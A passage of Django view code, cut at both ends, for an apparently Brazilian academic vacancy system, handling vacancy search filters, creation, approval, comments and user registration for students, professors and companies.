True:\n vagasAux.append(vaga)\n\n vagas = vagasAux\n\n vagasAux = []\n #TRATA FILTRO VALORES E SLIDERS\n for vaga in vagas:\n if salarioRemake is not None and salarioRemake != \"\":\n if vaga.valor_bolsa >= float(salarioRemake) and vaga.carga_horaria_semanal >= int(minvalueRemake) \\\n and vaga.carga_horaria_semanal <= int(maxvalueRemake) and vaga.nota_media >= int(avaliacaoRemake):\n vagasAux.append(vaga)\n continue\n elif vaga.carga_horaria_semanal >= int(minvalueRemake) and vaga.carga_horaria_semanal <= int(maxvalueRemake) and vaga.nota_media >= int(avaliacaoRemake):\n vagasAux.append(vaga)\n vagas = vagasAux\n\n #Listas auxiliares para tratar os dados em lista do request.post\n filtroSelecionado = filtroRemake\n inputTexto = textoRemake\n inputCurso = cursoRemake\n inputArea = areaRemake\n aux = 0\n for filtro in filtroSelecionado:\n #Lista auxiliar de vagas filtradas para lista de resposta da solicitação\n vagasAux = []\n #FILTRO - TODOS OS CAMPOS\n #VERIFICA SE O INPUT DE TEXTO TEM CASAMENTO EM QUALQUER UM DOS CAMPOS: Nome do gerente de vagas, areas de atuacao, cursos, titulo, descricao, local ou beneficios da vaga.\n if filtro == \"1\":\n if inputTexto[aux] is not None and inputTexto[aux] != \"\":\n busca.append(inputTexto[aux])\n for vaga in vagas:\n if inputTexto[aux] in vaga.gerente_vaga.user.first_name or inputTexto[aux] in vaga.gerente_vaga.user.last_name:\n vagasAux.append(vaga)\n continue\n if verificaAreasAtuacao(vaga, inputTexto[aux]):\n vagasAux.append(vaga)\n continue\n if verificaCursos(vaga, inputTexto[aux]):\n vagasAux.append(vaga)\n continue\n if inputTexto[aux] in vaga.titulo:\n vagasAux.append(vaga)\n continue\n if inputTexto[aux] in vaga.descricao:\n vagasAux.append(vaga)\n continue\n if vaga.gerente_vaga.user.groups.filter(name__in=['Empresa']).exists():\n if inputTexto[aux] in vaga.local or inputTexto[aux] in vaga.gerente_vaga.empresa.endereco:\n vagasAux.append(vaga)\n continue\n else:\n if inputTexto[aux] in vaga.local:\n vagasAux.append(vaga)\n continue\n if inputTexto[aux] in vaga.local:\n vagasAux.append(vaga)\n continue\n if inputTexto[aux] in vaga.beneficios:\n vagasAux.append(vaga)\n continue\n vagas = vagasAux\n #FILTRO - NOME DE VAGAS\n #VERIFICA SE O INPUT DE TEXTO TEM CASAMENTO COM O TITULO DA VAGA\n elif filtro == \"2\":\n if inputTexto[aux] is not None and inputTexto[aux] != \"\":\n busca.append(inputTexto[aux])\n for vaga in vagas:\n if inputTexto[aux] in vaga.titulo:\n vagasAux.append(vaga)\n vagas = vagasAux\n #FILTRO - EMPRESAS E/OU PROFESSORES\n #VERIFICA SE O INPUT DE TEXTO TEM CASAMENTO COM O NOME DO GERENTE DE VAGA\n elif filtro == \"3\":\n if inputTexto[aux] is not None and inputTexto[aux] != \"\":\n busca.append(inputTexto[aux])\n for vaga in vagas:\n if inputTexto[aux] in vaga.gerente_vaga.user.first_name or inputTexto[aux] in vaga.gerente_vaga.user.last_name:\n vagasAux.append(vaga)\n vagas = vagasAux\n #FILTRO - AREAS DE ATUACAO\n #VERIFICA SE O SELECT DE AREAS DE ATUACAO (RETORNA ID) TEM CASAMENTO COM O ID DE PELO MENOS UMA AREA DE ATUACAO DA VAGA\n elif filtro == \"4\":\n area = AreaAtuacao.objects.get(id=inputArea[aux])\n busca.append(area.nome)\n for vaga in vagas:\n if verificaAreasAtuacaoByID(vaga, inputArea[aux]):\n vagasAux.append(vaga)\n vagas = vagasAux\n #FILTRO - CURSOS\n #VERIFICA SE O SELECT DE CURSOS (RETORNA ID) TEM CASAMENTO COM O ID DE PELO MENOS UM CURSO DA VAGA (SE A VAGA NAO TIVER CURSO, ELA EH CONSIDERADA DISPONIVEL PARA TODOS)\n elif filtro == \"5\":\n curso = Curso.objects.get(id=inputCurso[aux])\n busca.append(curso.nome)\n for vaga in vagas:\n if verificaCursoByID(vaga, inputCurso[aux]):\n vagasAux.append(vaga)\n vagas = vagasAux\n #FILTRO - DESCRICAO\n #VERIFICA SE O INPUT DE TEXTO TEM CASAMENTO COM A DESCRICAO OU OS BENEFICIOS DA VAGA\n elif filtro == \"6\":\n if inputTexto[aux] is not None and inputTexto[aux] != \"\":\n busca.append(inputTexto[aux])\n for vaga in vagas:\n if inputTexto[aux] in vaga.descricao or inputTexto[aux] in vaga.beneficios:\n vagasAux.append(vaga)\n vagas = vagasAux\n #FILTRO - LOCAL\n #VERIFICA SE O INPUT DE TEXTO TEM CASAMENTO COM O LOCAL DA VAGA OU LOCAL DA EMPRESA\n elif filtro == \"7\":\n if inputTexto[aux] is not None and inputTexto[aux] != \"\":\n busca.append(inputTexto[aux])\n for vaga in vagas:\n if vaga.gerente_vaga.user.groups.filter(name__in=['Empresa']).exists():\n if inputTexto[aux] in vaga.local or inputTexto[aux] in vaga.gerente_vaga.empresa.endereco:\n vagasAux.append(vaga)\n else:\n if inputTexto[aux] in vaga.local:\n vagasAux.append(vaga)\n vagas = vagasAux\n #FILTRO - NENHUM CASO ATENDIDO\n else:\n vagasAux = Vaga.objects.filter(situacao=Vaga.ATIVA)\n vagas = vagasAux\n #Incrementa auxiliar iterador da lista\n aux+=1\n\n if request.method == 'POST':\n # Se a busca vier do \"Pesquisa rápida\", será tratado nesse trecho\n if 'buscar_keyword' in request.POST and request.POST.get('buscar_keyword') is not None and request.POST.get(\n 'buscar_keyword') != '':\n vagas = Vaga.objects.filter(situacao=Vaga.ATIVA)\n busca_rapida = request.POST.get('buscar_keyword')\n vagas = vagas.filter(titulo__icontains=busca_rapida)\n busca.append(request.POST.get('buscar_keyword'))\n initial = busca_rapida\n\n busca = ', '.join(busca)\n context = {'now': datetime.now(), 'form': form, 'vagas': vagas, 'busca': busca, 'initial': initial,\n 'formRemake': formRemake, 'ordemRemake': ordemRemake, 'checkBoxRemake': checkBoxRemake, 'salarioRemake': salarioRemake, 'minvalueRemake': minvalueRemake, 'maxvalueRemake': maxvalueRemake,\n 'avaliacaoRemake': avaliacaoRemake, 'superuserOptionRemake': superuserOptionRemake, 'radioRemake': radioRemake, 'filtroRemake': filtroRemake, 'textoRemake': textoRemake, 'areaRemake': areaRemake,\n 'cursoRemake': cursoRemake, 'cursosChoices': Curso.objects.all(), 'areasChoices': AreaAtuacao.objects.all(), 'filtrosPesquisa': filtrosPesquisa}\n return render(request, 'sva/vaga/pesquisarVagas.html', context)\n\n\n@login_required\n@user_passes_test(isGerenteVaga, login_url=\"/home/\")\ndef principal_vaga(request):\n return render(request, 'sva/vaga/vaga.html')\n\n\n@login_required\n@user_passes_test(isGerenteVaga, login_url=\"/home/\")\ndef gerenciar_vaga(request):\n context = {}\n gerente = GerenteVaga.objects.get(user=request.user)\n if gerente is None:\n return redirect(\"login\")\n\n form = FormularioGerenciaVaga(request.POST)\n context['form'] = form\n if form.is_valid() and form.cleaned_data['vaga_nome']!= \"\":\n context['vagas'] = Vaga.objects.filter(gerente_vaga_id=gerente.id, titulo__icontains=form.cleaned_data['vaga_nome']).order_by('-data_aprovacao','-data_alteracao','-data_submissao')\n else:\n context['vagas'] = Vaga.objects.filter(gerente_vaga_id=gerente.id).order_by('-data_aprovacao','-data_alteracao','-data_submissao')\n return render(request, 'sva/vaga/gerenciarVaga.html', context)\n\n@csrf_exempt\n@login_required\n@transaction.atomic\n@user_passes_test(isGerenteVaga, login_url=\"/home/\")\ndef criar_vaga(request):\n gerente = GerenteVaga.objects.get(user=request.user)\n if gerente is None or gerente.situacao != \"DEFERIDO\":\n messages.error(request, mensagens.ERRO_GERENTE_INATIVO, mensagens.MSG_ERRO)\n return redirect(principal_vaga)\n if request.is_ajax():\n novaarea = AreaAtuacao()\n if AreaAtuacao.objects.filter(nome=request.POST['area']).first():\n return redirect(gerenciar_areaatuacao)\n novaarea.nome = request.POST['area']\n print (\"Nova area\"+request.POST['area'])\n novaarea.situacao = AreaAtuacao.AGUARDANDO_APROVACAO\n novaarea.save()\n\n if request.method == 'POST':\n form = FormularioVaga(request.POST)\n if form.is_valid():\n form.save(commit=False)\n gerente = GerenteVaga.objects.get(user=request.user)\n if gerente is None:\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return redirect(principal_vaga)\n form.instance.gerente_vaga = gerente\n form.save()\n messages.success(request, 'Vaga criada com sucesso')\n return redirect(gerenciar_vaga)\n else:\n form = FormularioVaga()\n context = {'form': form, 'gerente': gerente}\n return render(request, 'sva/vaga/criarVaga.html', context)\n\n\n@login_required\n@user_passes_test(isGerenteVaga, login_url=\"/home/\")\ndef lista_alunos_vaga(request, pkvaga):\n gerente = GerenteVaga.objects.get(user=request.user)\n if gerente is None:\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return redirect(principal_vaga)\n\n vaga = get_object_or_404(Vaga, id=pkvaga)\n\n if vaga.gerente_vaga_id == gerente.id:\n context = {}\n context['alunos'] = Aluno.objects.filter(vagas_inscritas=vaga)\n context['qtd_alunos'] = Aluno.objects.filter(vagas_inscritas=vaga).count()\n context['vaga'] = vaga\n return render(request, 'sva/vaga/ListarAlunosVaga.html', context)\n\n else:\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return redirect(principal_vaga)\n\n\n@login_required\n@transaction.atomic\n@user_passes_test(isGerenteVaga, login_url=\"/home/\")\ndef encerrar_inscricao_vaga(request, pkvaga):\n gerente = GerenteVaga.objects.get(user=request.user)\n if gerente is None:\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return redirect(principal_vaga)\n\n vaga = get_object_or_404(Vaga, pk=pkvaga)\n if vaga is None or vaga.gerente_vaga_id != gerente.id:\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return redirect(principal_vaga)\n else:\n vaga.data_validade = datetime.now()\n vaga.situacao = 4\n vaga.save()\n messages.success(request, 'Inscrições encerradas')\n return redirect(gerenciar_vaga)\n\n\ndef visualizar_vaga(request, pkvaga):\n context = {}\n form = IndicarVaga(request.POST)\n vaga = get_object_or_404(Vaga, id=pkvaga)\n context['comentarios'] = Comentario.objects.filter(vaga=vaga)\n context['vaga'] = vaga\n context['form'] = form\n gerente = GerenteVaga.objects.get(vagas=vaga)\n aluno_inscrito_exists = False\n if(request.user.groups.filter(name='Aluno').exists()):\n aluno = Aluno.objects.get(user_id=request.user.id)\n context['aluno'] = aluno\n # Verifica se aluno logado eh interessado na vaga\n if (vaga.alunos_interessados.filter(id=aluno.id).exists()):\n context['interessado'] = 1\n else:\n context['interessado'] = 0\n #Verifica se aluno logado eh inscrito na vaga\n if(vaga.alunos_inscritos.filter(id=aluno.id).exists()):\n aluno_inscrito_exists = True\n context['inscrito'] = 1\n context['interessado'] = 2\n else:\n context['inscrito'] = 0\n\n context['gerente'] = gerente\n if request.user != gerente.user and vaga.situacao != 3 and not is_admin(request.user) and not aluno_inscrito_exists:\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return redirect(principal_vaga)\n\n if request.method == 'POST':\n if 'subscribe' in request.POST:\n vaga.alunos_inscritos.add(aluno)\n if (vaga.alunos_interessados.filter(id=aluno.id).exists()):\n vaga.alunos_interessados.remove(aluno)\n messages.success(request, 'Candidatado com sucesso')\n return redirect(visualizar_vaga, vaga.id)\n elif 'unsubscribe' in request.POST:\n vaga.alunos_inscritos.remove(aluno)\n messages.success(request, 'Candidatura removida com sucesso')\n return redirect(visualizar_vaga, vaga.id)\n elif 'interested' in request.POST:\n vaga.alunos_interessados.add(aluno)\n return redirect(visualizar_vaga, vaga.id)\n elif 'uninterested' in request.POST:\n vaga.alunos_interessados.remove(aluno)\n return redirect(visualizar_vaga, vaga.id)\n elif 'indicar' in request.POST:\n if form.is_valid():\n try:\n notifica = Notificacao()\n notifica.tipo = 1\n notifica.mensagem = aluno.user.first_name + ' indicou uma vaga para você. Clique para visualizar'\n notifica.link = reverse(\"vaga_visualizar\", args={pkvaga})\n notifica.usuario = User.objects.get(email=form.cleaned_data['email'])\n try:\n Aluno.objects.get(user=notifica.usuario)\n except:\n messages.error(request, 'O email indicado é de um usuário do sistema que não tem permissão para ser indicado')\n return redirect(visualizar_vaga, vaga.id)\n notifica.vaga = vaga\n notifica.save()\n mensagem = aluno.user.first_name+ ' indicou uma vaga para você. \\n\\n Descrição:\\n\\n ' \\\n +vaga.descricao\n send_mail('Vaga indicada - Sistema de Vagas Acadêmicas',\n mensagem, 'sva@cefetmg.br', [form.cleaned_data['email']])\n except:\n mensagem = aluno.user.first_name + 'indicou uma vaga para você. \\n\\n Descrição:\\n\\n' \\\n + vaga.descricao\n send_mail('Vaga indicada - Sistema de Vagas Acadêmicas',\n mensagem, 'sva@cefetmg.br', [form.cleaned_data['email']])\n messages.success(request, 'Indicado com sucesso')\n return redirect(visualizar_vaga, vaga.id)\n context['formulario_aprovacao'] = FormularioAprovacao()\n return render(request, 'sva/vaga/visualizarVaga.html', context)\n\n\n@login_required\n@transaction.atomic\n@user_passes_test(isGerenteVaga, login_url=\"/home/\")\ndef editar_vaga(request, pkvaga):\n gerente = GerenteVaga.objects.get(user=request.user)\n if gerente is None:\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return redirect(principal_vaga)\n vaga = get_object_or_404(Vaga, id=pkvaga)\n if vaga.gerente_vaga_id != gerente.id:\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return redirect(principal_vaga)\n\n if request.method == 'GET':\n form = FormularioVaga(instance=vaga)\n context = {}\n if vaga.data_validade is not None:\n data_val = vaga.data_validade.strftime('%Y-%m-%dT%H:%M')\n context['data_val'] = data_val\n context['form'] = form\n return render(request, 'sva/vaga/editarVaga.html', context)\n\n form = FormularioVaga(request.POST, instance=vaga)\n if form.is_valid():\n vaga.cursos = form.cleaned_data['cursos']\n vaga.areas_atuacao = form.cleaned_data['areas_atuacao']\n vaga.titulo = form.cleaned_data['titulo']\n vaga.descricao = form.cleaned_data['descricao']\n vaga.data_validade = form.cleaned_data['data_validade']\n vaga.carga_horaria_semanal = form.cleaned_data['carga_horaria_semanal']\n vaga.local = form.cleaned_data['local']\n vaga.valor_bolsa = form.cleaned_data['valor_bolsa']\n vaga.beneficios = form.cleaned_data['beneficios']\n vaga.data_aprovacao = None\n vaga.situacao = 2\n vaga.save()\n messages.success(request, 'Editado com sucesso')\n return redirect(gerenciar_vaga)\n\n\n@login_required\n@user_passes_test(is_admin)\ndef gerenciar_vaga_pendente(request):\n if 'filtro' in request.POST and request.POST['filtro'] is not None and request.POST['filtro'] != '':\n vagas = Vaga.objects.filter(data_aprovacao__isnull=True, situacao__gte=1, situacao__lte=2, titulo__icontains=request.POST['filtro']).order_by('-data_alteracao','-data_submissao')\n else:\n vagas = Vaga.objects.filter(data_aprovacao__isnull=True, situacao__gte=1, situacao__lte=2,).order_by('-data_alteracao','-data_submissao')\n context = {\n 'titulo_lista': 'Vagas com aprovação pendente',\n 'liberar_cadastro': True,\n 'vagas': vagas,\n }\n return render(request, 'sva/vaga/ListarVagasPendentes.html', context)\n\n\n@transaction.atomic\n@login_required\n@require_POST\n@user_passes_test(is_admin)\ndef aprovar_vaga(request, pkvaga):\n\n vaga = get_object_or_404(Vaga, id=pkvaga)\n form = FormularioAprovacao(request.POST)\n if vaga is not None and form.is_valid() and form.cleaned_data['aprovado'] == 'true':\n vaga.situacao = Vaga.ATIVA\n vaga.data_aprovacao = datetime.now()\n vaga.usuario_aprovacao = request.user\n vaga.save()\n mensagem = 'Seu cadastro da vaga %s foi aprovado no SVA por %s. Segue mensagem:\\n\\n %s' \\\n % (vaga.titulo, request.user.first_name, form.cleaned_data['justificativa'])\n send_mail('Avaliação de cadastro de vaga - Sistema de Vagas Acadêmicas',\n mensagem, 'sva@cefetmg.br', [vaga.gerente_vaga.user.email])\n else:\n vaga.situacao = Vaga.REPROVADA\n vaga.descricao = form.cleaned_data['justificativa'].upper() + '\\n\\n' + vaga.descricao\n vaga.save()\n mensagem = 'Seu cadastro da vaga %s foi recusado no SVA por %s. Segue mensagem:\\n\\n%s\\n\\nSVA' \\\n % (vaga.titulo, request.user.first_name, form.cleaned_data['justificativa'])\n send_mail('Avaliação de cadastro de vaga - Sistema de Vagas Acadêmicas',\n mensagem, 'sva@cefetmg.br', [vaga.gerente_vaga.user.email])\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n\n return redirect(visualizar_vaga, pkvaga)\n\n@login_required(login_url='/accounts/login/')\ndef adicionar_comentario(request,pkvaga):\n vaga = get_object_or_404(Vaga, pk=pkvaga)\n comentario = Comentario()\n if request.method == 'POST':\n form = ComentarioForm(request.POST)\n if form.is_valid():\n try:\n user = User.objects.get(id=form.cleaned_data['resposta'])\n realname = user.first_name+\" \"+user.last_name\n parte1 = form.cleaned_data['text'].split(\"[\")\n string = parte1[1].split(\"]\")\n comentario.user = request.user\n comentario.vaga = vaga\n comentario.text = form.cleaned_data['text']\n comentario.save()\n if string[0] == realname:\n notifica = Notificacao()\n notifica.tipo = 9\n notifica.mensagem = request.user.first_name + ' respondeu ao seu comentario. Clique para visualizar'\n notifica.link = reverse(\"vaga_visualizar\", args={pkvaga})\n notifica.usuario = user\n notifica.vaga = vaga\n notifica.save()\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n else:\n notifica = Notificacao()\n notifica.tipo = 8\n notifica.mensagem = request.user.first_name + ' fez um comentário em uma de suas vagas. Clique para visualizar'\n notifica.link = reverse(\"vaga_visualizar\", args={pkvaga})\n notifica.usuario = vaga.gerente_vaga.user\n notifica.vaga = vaga\n notifica.save()\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n except:\n comentario.user = request.user\n comentario.vaga = vaga\n comentario.text = form.cleaned_data['text']\n comentario.save()\n\n if request.user.first_name != vaga.gerente_vaga.user.first_name:\n notifica = Notificacao()\n notifica.tipo = 8\n notifica.mensagem = request.user.first_name + 'fez um comentário em uma de suas vagas. Clique para visualizar'\n notifica.link = reverse(\"vaga_visualizar\", args={pkvaga})\n notifica.usuario = vaga.gerente_vaga.user\n notifica.vaga = vaga\n notifica.save()\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n return redirect(visualizar_vaga, pkvaga)\n\n@login_required(login_url='/accounts/login/')\n@user_passes_test(is_admin)\ndef excluir_comentario(request,pkcomentario):\n comment = get_object_or_404(Comentario, pk=pkcomentario)\n vaga= comment.vaga\n comment.delete()\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n return redirect(visualizar_vaga, vaga.id)\n###############################################################################\n# CADASTRO #\n###############################################################################\n\n\ndef cadastro(request):\n context = {\n 'form_aluno': FormularioCadastroAluno(),\n 'form_professor': FormularioCadastroProfessor(),\n 'form_empresa': FormularioCadastroEmpresa(),\n 'cadastro': True\n }\n return render(request, 'sva/cadastro.html', context)\n\n\n@transaction.atomic\ndef cadastrar_empresa(request):\n form = FormularioCadastroEmpresa(request.POST or None)\n empresa = Empresa()\n if request.method == 'POST' and form.is_valid():\n username = form.cleaned_data['cnpj']\n usuario = User.objects.create_user(username)\n empresa.user = usuario\n empresa.user.email = form.cleaned_data['email']\n empresa.cnpj = form.cleaned_data['cnpj']\n empresa.nome = form.cleaned_data['nome']\n empresa.user.email = form.cleaned_data['email']\n empresa.user.set_password(form.cleaned_data['password'])\n empresa.user.groups = Group.objects.filter(Q(name='Empresa') | Q(name='Gerente Vagas'))\n empresa.user.save()\n empresa.save()\n #empresa.data_aprovacao = datetime.now()\n messages.info(request, mensagens.SUCESSO_AGUARDE_APROVACAO, mensagens.MSG_SUCCESS)\n return HttpResponseRedirect('/home/')\n return render(request, 'sva/empresa/CadastroEmpresa.html', {'form': form})\n\n\n@transaction.atomic\ndef cadastrar_aluno(request):\n form = FormularioCadastroAluno(request.POST or None)\n aluno = Aluno()\n if request.method == 'POST' and form.is_valid():\n username = form.cleaned_data['cpf']\n usuario = User.objects.create_user(username)\n aluno.user = usuario\n aluno.user.username = form.cleaned_data['cpf']\n name = form.cleaned_data['name']\n fullname = name.split(' ')\n aluno.user.first_name=fullname[0]\n fullname.remove(fullname[0])\n last_name=\"\"\n for aux in fullname:\n last_name=last_name+\" \"+aux\n aluno.user.last_name = last_name\n aluno.user.email = form.cleaned_data['email']\n aluno.user.set_password(form.cleaned_data['password'])\n aluno.user.save()\n aluno.curso = form.cleaned_data['curso']\n aluno.endereco = ',' + ',' + ',' + ','\n aluno.cpf = form.cleaned_data['cpf']\n aluno.user.groups = Group.objects.filter(name='Aluno')\n aluno.save()\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n return HttpResponseRedirect('/home/')\n return render(request, 'sva/aluno/CadastroAluno.html', {'form': form})\n\n\n@transaction.atomic\ndef cadastrar_professor(request):\n form = FormularioCadastroProfessor(request.POST or None)\n professor = Professor()\n if request.method == 'POST' and form.is_valid():\n username = form.cleaned_data['cpf']\n usuario = User.objects.create_user(username)\n professor.curso = form.cleaned_data['curso']\n professor.user_ptr_id = usuario.id\n professor.user = usuario\n professor.user.username = form.cleaned_data['cpf']\n name = form.cleaned_data['name']\n fullname = name.split(' ')\n professor.user.first_name = fullname[0]\n fullname.remove(fullname[0])\n last_name = \"\"\n for aux in fullname:\n last_name = last_name + \" \" + aux\n professor.user.last_name = last_name\n professor.user.email = form.cleaned_data['email']\n professor.user.set_password(form.cleaned_data['password'])\n professor.user.save()\n professor.cpf = form.cleaned_data['cpf']\n professor.siape = form.cleaned_data['siape']\n professor.user.groups = Group.objects.filter(Q(name='Professor') | Q(name='Gerente Vagas'))\n professor.save()\n messages.info(request, mensagens.SUCESSO_AGUARDE_APROVACAO, mensagens.MSG_SUCCESS)\n return redirect('login')\n return render(request, 'sva/professor/CadastroProfessor.html', {'form': form})\n\n\n###############################################################################\n# EMPRESA #\n###############################################################################\n\n@transaction.atomic\n@login_required(login_url='/accounts/login/')\ndef editar_empresa(request, pk):\n\n if pk != str(request.user.id):\n return HttpResponseRedirect('/home/')\n\n empresa = get_object_or_404(Empresa, user_id=pk)\n Nome = empresa.user.first_name + ' ' + empresa.user.last_name\n if empresa.endereco is not None:\n parte = empresa.endereco.split(\",\")\n initial = {\n 'Nome_Completo': Nome,\n 'Telefone': empresa.telefone,\n 'Email': empresa.user.email,\n 'Site': empresa.website,\n 'Bairro': parte[0],\n 'Rua': parte[1] if len(parte) >= 2 else '',\n 'Numero': parte[2] if len(parte) >= 3 else '',\n 'Complemento': parte[3] if len(parte) >= 4 else '',\n 'Cidade': parte[4] if len(parte) >= 5 else '',\n 'Estado': parte[5] if len(parte) >= 6 else '',\n }\n else:\n initial = {'Nome_Completo': Nome,\n 'Telefone': empresa.telefone,\n 'Email': empresa.user.email,\n 'Site': empresa.website}\n\n if request.method == 'GET':\n form = FormularioEditarEmpresa(instance=empresa, initial=initial)\n if request.method == 'POST':\n form = FormularioEditarEmpresa(request.POST, instance=empresa, initial=initial)\n if form.is_valid():\n empresa.website = form.cleaned_data['Site'] if form.cleaned_data['Site'] is not None else \"\"\n empresa.telefone = form.cleaned_data['telefone'] if form.cleaned_data['telefone'] is not None else \"\"\n empresa.nome = form.cleaned_data['nome']\n empresa.endereco = form.cleaned_data['Bairro'] + ',' + \\\n form.cleaned_data['Rua'] + ',' + \\\n form.cleaned_data['Numero'] + ',' + \\\n form.cleaned_data['Complemento'] + ',' + \\\n form.cleaned_data['Cidade'] + ',' + \\\n form.cleaned_data['Estado']\n empresa.save()\n empresa.user.first_name = form.cleaned_data['nome']\n empresa.user.last_name = \"\"\n empresa.user.email = form.cleaned_data['Email']\n empresa.user.save()\n messages.success(request, 'Editado com sucesso')\n return redirect(exibir_empresa, empresa.user_id)\n else:\n messages.error(request, 'Falha ao editar')\n return redirect(exibir_empresa, empresa.user_id)\n\n return render(request, 'sva/empresa/EditarEmpresa.html', {'form': form, 'empresa': empresa})\n\n@transaction.atomic\n@login_required(login_url='/accounts/login/')\ndef excluir_empresa(request, pk):\n empresa = get_object_or_404(Empresa, user_id=pk)\n if pk != str(request.user.id):\n messages.error(request, mensagens.ERRO_PERMISSAO_NEGADA, mensagens.MSG_ERRO)\n return HttpResponseRedirect('/home/')\n vagas = Vaga.objects.filter(gerente_vaga=empresa)\n for vaga in vagas:\n if vaga.vencida is False and vaga.situacao == 3:\n messages.error(request, mensagens.ERRO_HA_VAGAS_ATIVAS, mensagens.MSG_ERRO)\n return HttpResponseRedirect(reverse(\"Exibir_Empresa\", args={pk}))\n Vaga.objects.filter(gerente_vaga=empresa, situacao__range=(1,3)).update(situacao=4)\n empresa.user.is_active = False\n empresa.situacao = Empresa.EXCLUIDO\n empresa.save()\n empresa.user.save()\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n return HttpResponseRedirect('/home/')\n\n\n\ndef exibir_empresa(request, pk):\n empresa = get_object_or_404(Empresa, user_id=pk)\n if empresa.endereco is not None:\n parte = empresa.endereco.split(\",\")\n endereco = {\n 'Bairro': parte[0],\n 'Rua': parte[1] if len(parte) >= 2 else '',\n 'Numero': parte[2] if len(parte) >= 3 else '',\n 'Complemento': parte[3] if len(parte) >= 4 else '',\n 'Cidade': parte[4] if len(parte) >= 5 else '',\n 'Estado': parte[5] if len(parte) >= 6 else '',\n }\n else:\n endereco = {'Bairro': '', 'Rua': '', 'Numero': '', 'Complemento': '', 'Cidade': '', 'Estado': ''}\n context = {'empresa': empresa,\n 'endereco': endereco,\n 'form_aprovacao': FormularioAprovacao()}\n return render(request, 'sva/empresa/Perfil.html', context)\n\n\n@login_required(login_url='/accounts/login/')\n@user_passes_test(is_admin)\ndef listar_empresa(request):\n form = FormularioPesquisaEmpresa(request.POST)\n empresas = Empresa.objects.filter(situacao=Empresa.DEFERIDO)\n if form.is_valid():\n if form.cleaned_data['nome'] is not None and form.cleaned_data['nome'] != \"\":\n valor = form.cleaned_data['nome']\n query = Empresa.objects.annotate(search_name=Concat('user__first_name', Value(' '), 'user__last_name'))\n empresas = query.filter(Q(situacao=Empresa.DEFERIDO) & Q(nome__icontains=valor))\n context = {\n 'titulo_lista': 'Empresas Cadastradas',\n 'liberar_cadastro': False,\n 'form': form,\n 'empresas': empresas\n }\n return render(request, 'sva/empresa/ListarEmpresas.html', context)\n\n\n@login_required(login_url='/accounts/login/')\n@user_passes_test(is_admin)\ndef liberar_cadastro_empresas_lista(request):\n form = FormularioPesquisaEmpresa(request.POST)\n empresas = Empresa.objects.filter(situacao=Empresa.AGUARDANDO_APROVACAO)\n if form.is_valid():\n if form.cleaned_data['nome'] is not None and form.cleaned_data['nome'] != \"\":\n valor = form.cleaned_data['nome']\n query = Empresa.objects.annotate(search_name=Concat('user__first_name', Value(' '), 'user__last_name'))\n empresas = query.filter(Q(situacao=Empresa.AGUARDANDO_APROVACAO) & Q(nome__icontains=valor))\n context = {\n 'titulo_lista': 'Empresas com Cadastro Pendente',\n 'liberar_cadastro': True,\n 'form': form,\n 'empresas': empresas\n }\n return render(request, 'sva/empresa/ListarEmpresas.html', context)\n\n\n@transaction.atomic\n@login_required\n@require_POST\n@user_passes_test(is_admin)\ndef aprovar_cadastro_empresa(request, pk):\n empresa = get_object_or_404(Empresa, user__pk=pk)\n form = FormularioAprovacao(request.POST)\n if empresa is not None and form.is_valid() and form.cleaned_data['aprovado'] == 'true':\n empresa.user.is_active = True\n empresa.user.is_staff = True\n empresa.user.save()\n empresa.data_aprovacao = datetime.now()\n empresa.situacao = Empresa.DEFERIDO\n empresa.save()\n mensagem = 'Seu cadastro no SVA foi aprovado por %s. Segue mensagem:\\n\\n %s' \\\n 'Você agora pode acessar o sistema\\n\\nSVA' \\\n % (request.user.first_name, request.POST['justificativa'])\n send_mail('Aprovação de Cadastro - Sistema de Vagas Acadêmicas',\n mensagem, 'sva@cefetmg.br', [empresa.user.email])\n else:\n empresa.situacao = Empresa.INDEFERIDO\n empresa.data_aprovacao = None\n empresa.save()\n mensagem = 'Seu cadastro no SVA foi recusado por %s. Segue mensagem:\\n\\n%s\\n\\nSVA' \\\n % (request.user.first_name, request.POST['justificativa'])\n send_mail('Aprovação de Cadastro - Sistema de Vagas Acadêmicas',\n mensagem, 'sva@cefetmg.br', [empresa.user.email])\n messages.success(request, mensagens.SUCESSO_ACAO_CONFIRMADA, mensagens.MSG_SUCCESS)\n return render(request, 'sva/empresa/Perfil.html', {'empresa': empresa})\n\n\n###############################################################################\n# ALUNO #\n###############################################################################\n\n@transaction.atomic\n@login_required(login_url='/accounts/login/')\ndef editar_aluno(request, pk):\n if pk != str(request.user.id):\n return HttpResponseRedirect('/home/')\n aluno = get_object_or_404(Aluno,user_id=pk)\n Parte= aluno.endereco.split(\",\")\n Nome = aluno.user.first_name+' '+aluno.user.last_name\n initial = {'Rua': Parte[0],\n 'Numero': Parte[1] if len(Parte) >= 2 else '',\n 'Complemento': Parte[2] if len(Parte) >= 3 else '',\n 'Cidade': Parte[3] if len(Parte) >= 4 else '',\n 'Estado': Parte[4] if len(Parte) >= 5 else '',\n 'Nome_Completo': Nome,\n 'Email': aluno.user.email}\n if request.method == 'POST':\n form = FormularioEditarAluno(request.POST, instance=aluno, initial=initial)\n if form.is_valid():\n aluno.curso = form.cleaned_data['curso']\n aluno.telefone = form.cleaned_data['telefone']\n aluno.user.email = form.cleaned_data['Email']\n texto = 